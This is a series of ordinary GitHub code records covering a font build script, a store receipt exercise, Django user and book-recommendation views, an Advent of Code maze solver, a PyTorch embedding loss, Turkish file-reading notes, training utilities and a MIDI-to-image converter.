i.openTypeHheaLineGap = 1050, -350, 100\ni.openTypeOS2TypoAscender, i.openTypeOS2TypoDescender, i.openTypeOS2TypoLineGap = 1050, -350, 100\ni.openTypeOS2WinAscent, i.openTypeOS2WinDescent = 1100, 400\n\nfamily.set_masters([\n    (\"Regular\", 0),\n])\nfamily.set_styles([\n    (\"Regular\", 0, 400),\n])\n\nproject = hindkit.Project(\n    family,\n    fontrevision = \"0.200\",\n    options = {\n\n        \"prepare_kerning\": True,\n        \"prepare_mark_positioning\": True,\n\n        \"match_mI_variants\": 1,\n        \"position_marks_for_mI_variants\": True,\n\n        # \"build_ttf\": True,\n        \"do_style_linking\": True,\n\n        # \"use_os_2_version_4\": True,\n        # \"prefer_typo_metrics\": True,\n        # \"is_width_weight_slope_only\": True,\n\n        \"additional_unicode_range_bits\": [0, 1, 2],\n\n    },\n)\nproject.build()\n","repo_name":"agoodfeelingco/bakbak","sub_path":"sources/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"23997878521","text":"import datetime\n#declare the dictonary\ninventory={}\n#take input for price and item\nfor i in range(1,6):\n\n    #take user input\n    print(\"Please enter item\",i,\":\")\n    s=input()\n    print(\"Please enter the price of item\",i,\":\")\n    p=float(input())\n    #store values into dictonary\n    inventory[i-1]=s\n    #set value to key\n    inventory[s]=p\n\n#print welcome message\nprint(\"\\nWelcome to Ace HardWare!\\n\")\n#declare empty list\nname_l=[]\nquan_l=[]\n#take value from user\nfor i in range(3):\n    #take values\n    name=input(\"What is the first item you would like to purchase?\\n\")\n    quan=int(input(\"How many would you like to purchase?\\n\"))\n    #add into list\n    name_l.append(name)\n    quan_l.append(quan)\n#print time#\nprint(\"\\nThanks for shopping at Ace HardWare!\\n\")\nx = datetime.datetime.now()\nprint(x,'\\n')\n#print receipt\nfor i in range(3):\n    print(quan_l[i],' ',name_l[i],'(s) @',\"{0:.2f}\".format(inventory[name_l[i]]),' = $',\"{0:.2f}\".format(quan_l[i]*inventory[name_l[i]]),sep='')\n\n","repo_name":"AbbyWood22/MART120","sub_path":"homework_2/Ace.py","file_name":"Ace.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70908732627","text":"# Models\nfrom .models import User\nfrom tags.models import Tag\nfrom books.models import Book\nfrom tags.models import TagAffinity\nfrom numpy.random import choice\n# Django\nfrom rest_framework.decorators import api_view\nfrom rest_framework import 
status\nfrom rest_framework.response import Response\n\n# Serializer\nfrom .serializers import UserPostSerializer\nfrom .serializers import UserGetSerializer\nfrom .serializers import UserAddgenres\n# Utils\nfrom utils.documentation import get_documentation\n# drf yasg\nfrom drf_yasg.utils import swagger_auto_schema as sas\n\n\n\n#@sas(**get_documentation('post_user'))\n@api_view(['POST'])\ndef post_user(request, *args, **kwargs):\n data = request.data\n \n serializer = UserPostSerializer(data = request.data)\n if serializer.is_valid():\n email = serializer.validated_data.get('email')\n try:\n user = User.objects.get(email = email)\n except User.DoesNotExist:\n user = None\n if(user):\n return Response(\n {'El usuario ya existe'},\n status=status.HTTP_200_OK,\n )\n first_name = serializer.validated_data.get('first_name')\n last_name = serializer.validated_data.get('last_name')\n password = serializer.validated_data.get('password')\n list_of_tags = serializer.validated_data.get('list_of_tags')\n list_of_affinities = serializer.validated_data.get('list_of_affinities')\n user = User(\n email = email,\n first_name = first_name,\n last_name = last_name,\n password = password\n )\n user.save()\n # Asignar tags\n i = 0\n while i < len(list_of_tags):\n tagAux = list_of_tags[i]\n affinity = int(list_of_affinities[i])\n tag = Tag.objects.get(tag_name = tagAux)\n user.tag.add(tag)\n tagAffinity = TagAffinity.objects.create(\n tag_name_affinity = tagAux,\n affinity = affinity\n )\n user.tagAffinity.add(tagAffinity)\n i = i+1\n user.save()\n return Response(\n {'Usuario creado!'},\n status=status.HTTP_201_CREATED,\n )\n return Response(\n serializer.errors,\n status=status.HTTP_400_BAD_REQUEST\n )\n@api_view(['POST'])\ndef get_user(request, *args, **kwargs):\n data = request.data\n \n serializer = UserGetSerializer(data = request.data)\n if serializer.is_valid():\n try:\n user = User.objects.get(email = serializer.validated_data.get('email'))\n except User.DoesNotExist:\n user = None\n if(user):\n list_of_tags = []\n list_of_affinities = []\n print(user.tagAffinity.all())\n for tag in user.tagAffinity.all():\n list_of_tags.append(tag.tag_name_affinity)\n list_of_affinities.append(tag.affinity)\n\n response_dict = {\n 'first_name': user.first_name,\n 'second_name': user.last_name,\n 'list_of_tags': list_of_tags,\n 'list_of_affinities': list_of_affinities\n }\n return Response(\n response_dict,\n status=status.HTTP_200_OK,\n ) \n return Response(\n {'El usuario no existe'},\n status=status.HTTP_400_BAD_REQUEST,\n )\n return Response(\n serializer.errors,\n status=status.HTTP_400_BAD_REQUEST\n )\n\n@api_view(['POST'])\ndef get_recomendations(request, *args, **kwargs):\n data = request.data\n serializer = UserGetSerializer(data = request.data)\n if serializer.is_valid():\n try:\n user = User.objects.get(email = serializer.validated_data.get('email'))\n except User.DoesNotExist:\n user = None\n if(user):\n list_of_affinities = []\n list_of_affinities_aux = user.tagAffinity.all()\n tags = user.tag.all()\n i = 0\n for tag in tags:\n if(tag.tag_name == list_of_affinities_aux[i].tag_name_affinity):\n list_of_affinities.append(list_of_affinities_aux[i].affinity)\n i = i+1\n list_of_books = []\n i = 0\n for tag in tags:\n books = Book.objects.filter(tag = tag)\n random_books = choice(books, list_of_affinities[i])\n i = i+1\n list_of_books.extend(random_books)\n final = choice(list_of_books, 20)\n dict_response = {}\n i = 1\n for book in final:\n dict_response.update({'Book '+str(i): {}})\n dict_response['Book 
'+str(i)].update({'title': book.title})\n dict_response['Book '+str(i)].update({'summary': book.summary})\n dict_response['Book '+str(i)].update({'tags': {}})\n j = 1\n for tag in book.tag.all():\n dict_response['Book '+str(i)]['tags'].update({'tag_name '+str(j): tag.tag_name})\n j = j+1\n i += 1\n \n return Response (\n dict_response,\n status=status.HTTP_200_OK\n )\n\n return Response(\n {'El usuario no existe'},\n status=status.HTTP_400_BAD_REQUEST,\n )\n return Response(\n serializer.errors,\n status=status.HTTP_400_BAD_REQUEST\n )","repo_name":"HectorPerezM/vivlio","sub_path":"django/users/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11268925032","text":"from queue import Queue\n\ndef load_input(inpf):\n grid = []\n with open(inpf) as f:\n\n for line in f.read().splitlines():\n if not line.strip():\n continue\n grid.append([c for c in line])\n \n doors = []\n\n # horizontal doors\n y = 0\n for row in grid:\n for i in range(0, len(row) - 1):\n door = row[i] + row[i+1]\n #print(door)\n if door.isalpha():\n if i == 0:\n doors.append((i+2, y, door, 'outer'))\n elif i == len(row) - 2:\n doors.append((i-1, y, door, 'outer'))\n elif i+2 < len(row) and row[i+2] == '.':\n doors.append((i+2, y, door, 'inner'))\n else:\n doors.append((i-1, y, door, 'inner'))\n y += 1\n\n for x in range(0, len(grid[0])):\n for y in range(0, len(grid)-1):\n door = grid[y][x] + grid[y+1][x]\n if door.isalpha():\n if y == 0:\n doors.append((x, y+2, door, 'outer'))\n elif y == len(grid) - 2:\n doors.append((x, y-1, door, 'outer'))\n elif y+2 < len(grid) and grid[y+2][x] == '.':\n doors.append((x, y+2, door, 'inner'))\n else:\n doors.append((x, y-1, door, 'inner'))\n\n door_map = {}\n door_types = {}\n for x, y, door, tp in doors:\n mapping = door_map.get(door)\n if not mapping:\n mapping = []\n door_map[door] = mapping\n mapping.append((x,y))\n door_types[(x,y)] = tp\n \n portals = {}\n for _, entrances in door_map.items():\n if len(entrances) == 2:\n portals[entrances[0]] = entrances[1]\n portals[entrances[1]] = entrances[0]\n\n return (grid, portals, door_map, door_types)\n\n\ndef available_tiles(x, y, grid):\n #print(x,y)\n available = []\n for xx, yy in [\n (x+1, y),\n (x, y-1),\n (x-1, y),\n (x, y+1)]:\n tile = grid[yy][xx]\n #print(xx, yy, tile)\n if tile == '.':\n #print(' .. 
append')\n available.append((xx, yy))\n return available\n\n\ndef reach_doors(x,y, grid, doors):\n terminal = set()\n for _, entrances in doors.items():\n terminal = terminal.union(set(entrances))\n \n reached = []\n q = Queue()\n visited = set()\n start = (x,y)\n\n q.put((x, y, 0))\n\n visited.add((x,y))\n\n while not q.empty():\n x, y, path_len = q.get()\n if (x,y) in visited:\n if (x,y) != start:\n #print('out?')\n continue\n \n visited.add((x,y))\n\n if (x,y) in terminal and (x,y) != start:\n reached.append((x,y, path_len))\n\n for xx, yy in available_tiles(x, y, grid):\n #print(xx, yy)\n q.put((xx, yy, path_len + 1))\n\n return reached\n\nclass V:\n\n def __init__(self, n, _type=None):\n self.n = n\n self.type = _type\n self.in_edges = []\n self.out_edges = []\n \n def __repr__(self):\n return 'V({}, {})'.format(self.n, self.type)\n \n def __eq__(self, o):\n if isinstance(o, V):\n return o.n == self.n\n return False\n \n def __hash__(self):\n return self.n.__hash__()\n \n\nclass E:\n\n def __init__(self, a, b, length=0):\n self.a = a\n self.b = b\n self.length = length\n \n def __repr__(self):\n return '{} <-> {}, {} steps'.format(self.a, self.b, self.length)\n \n def __eq__(self, o):\n if isinstance(o, E):\n return o.a == self.a and o.b == self.b\n return False\n \n def __hash__(self):\n return '{}<>{}'.format(self.a, self.b).__hash__()\n\n\n\nclass G:\n\n def __init__(self):\n self.vertices = {}\n self.edges = {}\n \n def add_vertex(self, n):\n if isinstance(n, V):\n self.vertices[n.n] = n\n return n\n v = V(n)\n self.vertices[n] = v\n return v\n \n def vertex(self, n):\n return self.vertices[n]\n \n def remove_vertex(self, v):\n if v.n not in self.vertices:\n return\n del self.vertices[v.n]\n \n self.edges = {vxs:edge for vxs, edge in filter(lambda vs: v not in vs, self.edges.items())}\n\n def add_edge(self, a, b, length=None):\n edge = E(a, b, length)\n if self.edges.get((a,b)):\n ex = self.edges[(a,b)]\n a.out_edges.remove(ex)\n b.in_edges.remove(ex)\n self.edges[(a,b)] = edge\n a.out_edges.append(edge)\n b.in_edges.append(edge)\n return edge\n\n def clone(self):\n cl = G()\n\n for n, v in self.vertices.items():\n cv = V(n, v.type)\n cl.add_vertex(cv)\n \n for vxs, edge in self.edges.items():\n va, vb = vxs\n ce = cl.add_edge(cl.vertex(va.n), cl.vertex(vb.n))\n ce.length = edge.length\n\n return cl\n\n def __repr__(self):\n return '{} vertices, {} edges'.format(len(self.vertices), len(self.edges))\n\n\ndef build_graph(inpf, use_portals=True):\n grid, portals, dmap, dtypes = load_input(inpf)\n graph = G()\n\n doors = {}\n for door, entrances in dmap.items():\n if len(entrances) == 1:\n doors[door] = entrances[0]\n else:\n for i in range(0, 2):\n doors[door + str(i)] = entrances[i]\n \n rdoors = {}\n for name, pos in doors.items():\n v = graph.add_vertex(name)\n rdoors[pos] = name\n v.type = dtypes[pos]\n \n for name, door in doors.items():\n x, y = door\n for xx, yy, path_len in reach_doors(x, y, grid, dmap):\n if use_portals:\n other = portals.get((x,y))\n if other == (xx, yy):\n continue\n edge = graph.add_edge(graph.vertex(name), graph.vertex(rdoors[(xx, yy)]))\n edge.length = path_len\n \n if use_portals:\n # add portals as edges with 0 length\n for a,b in portals.items():\n va = graph.vertex(rdoors[a])\n vb = graph.vertex(rdoors[b])\n edge = graph.add_edge(va, vb)\n edge.length = 1\n \n return graph\n\n\ndef build_multilevel_graph(inpf, levels):\n grid, portals, dmap, dtypes = load_input(inpf)\n\n tunnels = {}\n for door, _ in dmap.items():\n door = door[0:2]\n if door not in 
['AA', 'BB']:\n tunnels[door + '0'] = door + '1'\n tunnels[door + '1'] = door + '0'\n\n og = build_graph(inpf, False)\n graph = G()\n\n \n level = 1\n while level < levels:\n for _, v in og.vertices.items():\n if v.n in ['AA', 'ZZ']:\n continue\n graph.add_vertex(V('{}.{}'.format(v.n, level), v.type))\n \n for _, edge in og.edges.items():\n a = edge.a\n b = edge.b\n\n\n if a.n in ('AA', 'ZZ') or b.n in ('AA', 'ZZ'):\n continue\n if a.type == b.type:\n graph.add_edge(\n graph.vertex('{}.{}'.format(a.n, level)),\n graph.vertex('{}.{}'.format(b.n, level)),\n edge.length,\n )\n graph.add_edge(\n graph.vertex('{}.{}'.format(b.n, level)),\n graph.vertex('{}.{}'.format(b.n, level)),\n edge.length,\n )\n elif a.type == 'outer':\n graph.add_edge(\n graph.vertex('{}.{}'.format(a.n, level)),\n graph.vertex('{}.{}'.format(b.n, level)),\n edge.length,\n )\n graph.add_edge(\n graph.vertex('{}.{}'.format(b.n, level)),\n graph.vertex('{}.{}'.format(a.n, level)),\n edge.length,\n )\n if level > 1:\n prev_n = tunnels[a.n]\n graph.add_edge(\n graph.vertex('{}.{}'.format(prev_n, level-1)),\n graph.vertex('{}.{}'.format(a.n, level)),\n 1\n )\n graph.add_edge(\n graph.vertex('{}.{}'.format(a.n, level)),\n graph.vertex('{}.{}'.format(prev_n, level-1)),\n 1\n )\n else:\n pass\n \n level += 1\n\n\n aa = og.vertex('AA')\n a = graph.add_vertex(V('AA', 'outer'))\n for edge in aa.out_edges:\n b = edge.b\n if b.type == 'inner':\n graph.add_edge(\n a,\n graph.vertex('{}.1'.format(b.n)),\n edge.length + 1\n )\n else:\n pass\n\n \n zz = og.vertex('ZZ')\n z = graph.add_vertex(V('ZZ', 'outer'))\n for edge in zz.in_edges:\n a = edge.a\n if a.type == 'inner':\n graph.add_edge(\n graph.vertex('{}.1'.format(a.n)),\n z,\n edge.length + 1\n )\n else:\n pass\n\n return graph\n\n\ndef dijkstra(graph):\n start = graph.vertex('AA')\n end = graph.vertex('ZZ')\n\n distance = {start.n: 0}\n visited = set()\n\n q = [start]\n\n while q:\n q = sorted(q, key=lambda v: distance.get(v.n, 2**30))\n curr = q[0]\n #print(curr, curr.out_edges)\n q = q[1:]\n if curr in visited and curr != start:\n continue\n if curr == end:\n return distance[curr.n]\n dist = distance[curr.n]\n visited.add(curr)\n for edge in curr.out_edges:\n nn = edge.b\n alt = edge.length + dist\n if alt < distance.get(nn.n, 2**30):\n distance[nn.n] = alt\n q.append(nn)\n \n\n\ninput_file = 'input'\n\ngraph = build_graph(input_file)\nprint(graph)\nprint('Part 1:', dijkstra(graph))\n\nmg = build_multilevel_graph(input_file, 100)\nprint(mg)\nprint('Part 2:', dijkstra(mg) - 2) # '- 2' because I tie some extra node in the graph obviously!\n","repo_name":"natemago/advent-of-code-2019","sub_path":"day-20-donut-maze/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":10131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42135410649","text":"from torch.nn.modules.module import Module\nimport torch\nfrom torch import Tensor\nfrom torch.nn import functional as F\nimport gc\nfrom time import sleep\n\nimport matplotlib\nmatplotlib.use('agg')\nfrom matplotlib import collections as mc\nimport pylab\nimport matplotlib.pyplot as plt\nimport time\nfrom skimage.io import imsave\n\nclass SupervisedInstanceEmbeddingLoss(Module):\n def __init__(self, push_margin):\n super().__init__()\n self.push_margin = push_margin\n\n def pull_distance(self, x, y, dim_channels, dim_samples):\n return (x - y).norm(p=2, dim=dim_channels).mean(dim=dim_samples)\n\n def push_distance_measure(self, x, y, dim_channels):\n return 
(self.push_margin - (x-y).norm(p=2, dim=dim_channels)).relu_()\n\n def push_distance(self, centroids, dim_channels, dim_samples):\n assert centroids.dim() == 2\n distance_matrix = self.push_distance_measure(\n centroids.unsqueeze(dim_samples),\n centroids.unsqueeze(dim_samples+1),\n dim_channels=-1,\n )\n # select vectorized upper triangle of distance matrix\n n_clusters = distance_matrix.shape[0]\n upper_tri_index = torch.arange(1, n_clusters * n_clusters + 1) \\\n .view(n_clusters, n_clusters) \\\n .triu(diagonal=1).nonzero().transpose(0, 1)\n cluster_distances = distance_matrix[upper_tri_index[0], upper_tri_index[1]]\n\n return cluster_distances.mean()\n\n def forward(self, abs_embedding, coordinates, y, split_pull_push=False):\n pull_loss = torch.tensor(0.).to(abs_embedding.device)\n push_loss = torch.tensor(0.).to(abs_embedding.device)\n\n for b in range(len(y)):\n cx = coordinates[b, :, 1].long()\n cy = coordinates[b, :, 0].long()\n\n y_per_patch = y[b, cx, cy]\n centroids = []\n dim_channels, dim_samples = 1, 0\n pull_over_instances = 0\n\n for idx in torch.unique(y_per_patch):\n patch_mask = y_per_patch == idx\n if idx == 0:\n # skip background instance\n continue\n\n instance_embedding = abs_embedding[b, patch_mask]\n\n centroid = instance_embedding.mean(dim=dim_samples,\n keepdim=True)\n centroids.append(centroid)\n pull_over_instances = pull_over_instances + \\\n self.pull_distance(\n centroid, instance_embedding, dim_channels, dim_samples)\n\n # add push loss between centroids\n if len(centroids) > 1:\n pull_loss = pull_loss + (pull_over_instances / len(centroids))\n push_loss = push_loss + self.push_distance(torch.cat(centroids, dim=0),\n dim_channels, dim_samples)\n\n if split_pull_push:\n return pull_loss, push_loss\n else:\n return pull_loss + push_loss\n","repo_name":"funkelab/lisl","sub_path":"lisl/pl/loss_supervised.py","file_name":"loss_supervised.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73407515026","text":"#Eğer bir uygulama yazarken aşağıdaki kalıbı kullanarak dosya yazarsanız kapatmayı unuttuğunuzda python sizin için dosyayı kaptır ve bilgisayarınızı zorlamaz.\r\nwith open(\"yazılım.txt\",\"r\") as dosya:\r\n dosya.seek(10)\r\n print(dosya.read())\r\n#Yukarıda da seek() donksiyonuna verdiğimiz argümandan sonraki kısmını ekrana yazdırır.\r\n\r\nwith open(\"yazılım.txt\",\"r\") as dosya:\r\n dosya.seek(10)\r\n print(dosya.read())\r\n dosya.seek(5)\r\n print(dosya.read)\r\n#Yukarıdaki gibi bir program yazarsak seek() fonksiyonu normalde 10 karakter ileri atmıştı ama bu diğer işlemde en başa döner ve toplam olarak 15 olmaz 5 karakter ileri gider.\r\n\r\nwith open(\"yazılım.txt\",\"r\") as dosya:\r\n dosya.seek(10)\r\n print(dosya.read(5))\r\n#Yukarıdaki programı çalıştırırsakta 10 katrakter sonrasındaki 5 karakteri ekrana bastıracaktır.\r\n\r\nwith open(\"yazılım.txt\",\"r\") as dosya:\r\n dosya.seek(10)\r\n str1 = dosya.read(5)\r\n dosya.seek(15)\r\n str2 = dosya.read(5)\r\n print(str1,str2)\r\n#Yukarıdaki pRogramı da çalıştırırsak eğer ilk olarak baştan 10 karakter gidip sonraki 5 karakteri bastıracak ve sonrada baştan 15 karakter gidip sonraki 5 karakteri bastıracak.\r\n\r\n","repo_name":"cdemir7/Python_Ornekleri","sub_path":"Dosyadan veri alma ve okuma işlemleri 2.py","file_name":"Dosyadan veri alma ve okuma işlemleri 
2.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72979435666","text":"from argparse import Namespace\nfrom typing import Callable, Iterator, Optional, Union\n\nfrom torch import nn, optim\n\ndef get_initialiser(name: str) -> Callable:\n if name == \"orthogonal\":\n return nn.init.orthogonal_\n elif name == \"xavier\":\n return nn.init.xavier_uniform_\n elif name == \"kaiming\":\n return nn.init.kaiming_uniform_\n elif name == \"none\":\n pass\n else:\n raise Exception(\"Unknown init method\")\n\n\ndef get_optimizer(\n args: Namespace, params: Iterator[nn.Parameter], net: Optional[str] = None\n) -> optim.Optimizer:\n weight_decay = args.weight_decay\n lr = args.lr\n\n optimizer = None\n if args.optimizer == \"sgd\":\n optimizer = optim.SGD(params, lr=lr, weight_decay=weight_decay)\n elif args.optimizer == \"adam\":\n optimizer = optim.Adam(params, lr=lr, weight_decay=weight_decay)\n elif args.optimizer == \"amsgrad\":\n optimizer = optim.Adam(params, lr=lr, amsgrad=True, weight_decay=weight_decay)\n return optimizer\n\n\nclass NoneScheduler:\n def step(self):\n pass\n\n\ndef get_lr_scheduler(\n args: Namespace, optimizer: optim.Optimizer\n) -> Union[\n optim.lr_scheduler.ExponentialLR,\n optim.lr_scheduler.CosineAnnealingLR,\n optim.lr_scheduler.CyclicLR,\n NoneScheduler,\n]:\n if args.lr_scheduler == \"exponential\":\n return optim.lr_scheduler.ExponentialLR(optimizer, gamma=args.lr_gamma)\n elif args.lr_scheduler == \"cosine\":\n return optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.max_epochs, eta_min=0)\n elif args.lr_scheduler == \"cycle\":\n return optim.lr_scheduler.CyclicLR(\n optimizer, 0, max_lr=args.lr, step_size_up=20, cycle_momentum=False\n )\n elif args.lr_scheduler == \"none\":\n return None\n\n\ndef get_optimizer_scheduler(\n args: Namespace, model: nn.Module\n):\n optimizer = get_optimizer(args=args, params=model.parameters())\n lr_scheduler = get_lr_scheduler(args=args, optimizer=optimizer)\n return optimizer, lr_scheduler\n\ndef get_initialiser(name='xavier'):\n if name == \"orthogonal\":\n return nn.init.orthogonal_\n elif name == \"xavier\":\n return nn.init.xavier_uniform_\n elif name == \"kaiming\":\n return nn.init.kaiming_uniform_\n elif name == \"none\":\n pass\n else:\n raise Exception(\"Unknown init method\")\n\n\ndef get_activation(name: str, leaky_relu: Optional[float] = 0.5) -> nn.Module:\n if name == \"leaky_relu\":\n return nn.LeakyReLU(leaky_relu)\n elif name == \"rrelu\":\n return nn.RReLU()\n elif name == \"relu\":\n return nn.ReLU()\n elif name == \"elu\":\n return nn.ELU()\n elif name == \"gelu\":\n return nn.GELU()\n elif name == \"prelu\":\n return nn.PReLU()\n elif name == \"selu\":\n return nn.SELU()\n else:\n raise Exception(\"Unknown activation\")\n\ndef get_iter(data_matrix, batch_size, shuffle=True):\n dataset = Dataset_from_matrix(data_matrix)\n iterator = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle)\n return iterator","repo_name":"hlzhang109/TransTEE","sub_path":"Dosage/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"17459163710","text":"import music21\nimport numpy as np\nfrom music21 import *\nfrom imageio import imwrite\nimport cv2\nimport os\n\n\ndef get_note(note):\n return int(note.pitch.ps)\n\ndef get_duration(element):\n return 
element.duration.quarterLength\n\ndef get_note_details(elements_to_parse,verbose=False):\n durations = []\n notes = []\n start = []\n amplitudes = []\n\n # the constituent elements of the score\n # We need:\n # - Notes\n # - chords\n for element in elements_to_parse:\n if verbose:\n print(element)\n if isinstance(element, note.Note):\n if not element.isRest:\n # offset is the position of the note in the song (offset from beginning)\n start.append(element.offset)\n # the note is identified using ps, which is found by combining the note name, octave, and accidental (sharp # or flat -)\n # this note value is recorded as a number\n notes.append(int(element.pitch.ps))\n # duration is measured in quarter notes and is given as a float. 0.5 quarter notes are eight notes\n durations.append(element.duration.quarterLength)\n # amplitude is recorded using velocityscalar, a value between 0 and 1 which scales to a value between 0 and 127 when used in the midi file\n amplitudes.append(element.volume.velocityScalar)\n\n # basically the same as with note but we get the notes that constitute the chord instead\n if isinstance(element, chord.Chord):\n if not element.isRest:\n for chord_note in element.notes:\n start.append(element.offset)\n notes.append(int(chord_note.pitch.ps))\n durations.append(element.duration.quarterLength)\n amplitudes.append(element.volume.velocityScalar)\n\n return {\"pitch\": notes, \"amps\" : amplitudes, \"start\": start, \"dur\": durations}\n\n\ndef get_tempo(midi):\n for instrument_part in instrument.partitionByInstrument(midi):\n instrument_notes = instrument_part.recurse()\n for n in instrument_notes:\n if isinstance(n, tempo.MetronomeMark):\n # print(\"bpm\",n.getQuarterBPM())\n return n.getQuarterBPM()\n return 120\n\ndef get_time_sig(midi):\n for instrument_part in instrument.partitionByInstrument(midi):\n instrument_notes = instrument_part.recurse()\n #print(\"timesig:\",instrument_part)\n for n in instrument_notes:\n #print(n)\n if isinstance(n, meter.TimeSignature):\n #print(n.ratioString)\n return n.ratioString\n return [4,4]\n\ndef create_image(inst, score, image_data, dest_path, count=0, verbose=False):\n scale = 4\n image_res = image_data[0]\n image_height = image_data[1]\n image_length = image_data[2]\n\n\n if verbose:\n print(\"Drawing:\", inst)\n\n pitches = score[\"pitch\"]\n amplitudes = score[\"amps\"]\n durations = score[\"dur\"]\n starts = score[\"start\"]\n\n if verbose:\n print(\"p\", pitches)\n print(\"a\", amplitudes)\n print(\"d\", durations)\n print(\"s\", sorted(starts, reverse=False))\n # print(\"end\",starts[-1])\n # print(\"dur\",durations[-1])\n\n pixels = np.zeros((image_height, int(image_length)))\n\n # print(starts[100:110])\n\n for i in range(len(pitches)):\n # converting to an int here may prove a problem on fractions. 
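(music21 quarterLengths can be Fraction values, e.g. 1/3 for triplets, which int() silently truncates).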
Will have to figure that out later\n start = int(starts[i] * image_res * scale)\n dur = int(durations[i] * image_res * scale)\n pitch = int(pitches[i])\n\n new_bar_count = 0\n for j in range(start, start + dur):\n try:\n if image_res > 1:\n beg = (pitch * image_res) - int(image_res / 2)\n end = (pitch * image_res) + int(image_res / 2) + 1\n pixels[beg:end, j] = amplitudes[i] * 255\n\n else:\n pixels[pitch, j] = amplitudes[i] * 255\n\n except IndexError:\n while True:\n try:\n new_bar = np.zeros((image_height, int(image_length)))\n pixels = np.append(pixels, new_bar, axis=1)\n if image_res > 1:\n beg = (pitch * image_res) - int(image_res / 2)\n end = (pitch * image_res) + int(image_res / 2) + 1\n pixels[beg:end, j] = amplitudes[i] * 255\n else:\n pixels[pitch, j] = amplitudes[i] * 255\n new_bar_count = 0\n break\n except:\n new_bar = np.zeros((image_height, int(image_length)))\n pixels = np.append(pixels, new_bar, axis=1)\n new_bar_count += 1\n\n # check if the destination directory exists, if not then make it\n if not os.path.exists(dest_path):\n os.makedirs(dest_path)\n\n # creates the midi image at the destination\n status = cv2.imwrite(os.path.join(dest_path, f\"{inst}{count}.png\"), pixels)\n if verbose:\n print(\"Written:\", inst, \"image to\",dest_path)\n print()\n return status\n\ndef midi_to_image(path, image_res=4, upper=127, lower=8, verbose=False, dest_path=None, specific_inst=\"\",count=0, silence_warning=True):\n #print(\"___MIDI TO IMAGE___\")\n if dest_path is None:\n dest_path = path\n # The following declares the current midi and establishes the tempo and time sig\n # print(\"Getting:\",path)\n\n # overwrites a warning produced by some midi files about empty chords being treated as grace\n if silence_warning:\n def noop(input):\n pass\n music21.midi.translate.environLocal.warn = noop\n try:\n midi = converter.parse(path)\n except:\n return False\n if instrument.partitionByInstrument(midi) is None:\n return False\n tempo = get_tempo(midi)\n timesig = get_time_sig(midi)\n scale = 4\n\n # Calculate bar length for the image size\n bar_length = 60/tempo * int(timesig[0])\n\n if verbose:\n print(\"Processing midi_____\")\n print(f\"Midi tempo:{tempo} timesig:{timesig} bar_length:{bar_length}\")\n\n # we multiply the bar length by 4 and the image resolution in order to scale it up\n image_length = bar_length*image_res * scale\n image_height = (upper - lower) * image_res\n\n # Retrieval of music scores for each instrument\n data = {}\n try:\n i = 0\n for instrument_part in instrument.partitionByInstrument(midi):\n # If a specific instrument has been stated then only an image of that is created\n if specific_inst != \"\" and specific_inst.lower() not in instrument_part.partName.lower():\n # print(instrument_part.partName.lower())\n # print(\"continuing\")\n continue\n # print(specific_inst)\n # print(instrument_part.partName.lower())\n # print(\"match\")\n # print()\n\n if verbose:\n print(\"ip\",instrument_part)\n\n instrument_notes = instrument_part.recurse()\n note_data = get_note_details(instrument_notes)\n #print(note_data)\n\n if len(note_data[\"start\"]) > 0:\n if instrument_part.partName is None:\n if instrument_part.instrumentName is not None:\n data[instrument_part.instrumentName] = note_data\n print(instrument_part.instrumentName)\n else:\n data[f\"instrument_{i}\"] = note_data\n i+=1\n else:\n # saves the notes of that instrument to a dictionary value, the key of which is the name of the instrument\n data[instrument_part.partName] = note_data\n if verbose:\n 
print(\"pn\", instrument_part.partName)\n else:\n if verbose:\n print(instrument_part,\"failed\")\n except:\n # print(\"Exception\")\n instrument_notes = midi.flat.notes\n data[\"instrument_0\"] = get_note_details(instrument_notes)\n\n # if verbose:\n # print(\"IR:\",image_res)\n # print(\"IL:\",image_length)\n # print(\"IH:\",image_height)\n # print(\"BL:\",bar_length)\n\n # Writing to image section\n status = False\n for inst, score in data.items():\n # print(inst.lower())\n # print(\"match\",specific_inst.lower() in inst.lower())\n #print(inst)\n image_data = (image_res, image_height, image_length)\n status = create_image(inst, score, image_data, dest_path, count=count,\n verbose=verbose) # ,score,verbose,image_res,dest_path,count=0\n count += 1\n ## This was to make sure that only the right instrument is recorded but the check was moved earlier in the function\n # if specific_inst.lower() in inst.lower():\n # inst=specific_inst\n #\n # # If a specific instrument has been stated then only an image of that is created\n # if specific_inst != \"\" and specific_inst != inst:\n # continue\n # else:\n\n return status\n\n\ndef find_music_qualities(midipath):\n \"\"\"\n parse returns a music score based on the midi data given, that can then be analysed\n :return:\n \"\"\"\n\n # score contains\n score = converter.parse(midipath)\n print(score)\n print(len(score.pitches), \"notes in the song\")\n print(len(score.parts), \"instruments in the song\")\n\n # This breaks down the track into instrumental parts\n i = 0\n for part in score.parts:\n #print(\"Stream:\",part)\n print(\"Name:\",part.partName)\n #print(\"RecursiveIterator:\",part.recurse())\n #print(f\"Getting elements of: {part.partName}\")\n notes = get_note_details(part.recurse())\n i+=1\n #part.show()\n\n\n#midipath = r\"TrainingData/Music(old)/AC_DC/Back_In_Black.1.mid\"\n\n# find_music_qualities(midipath)\n#midi_to_image(midipath, dest_path=\"ACDCTest\", 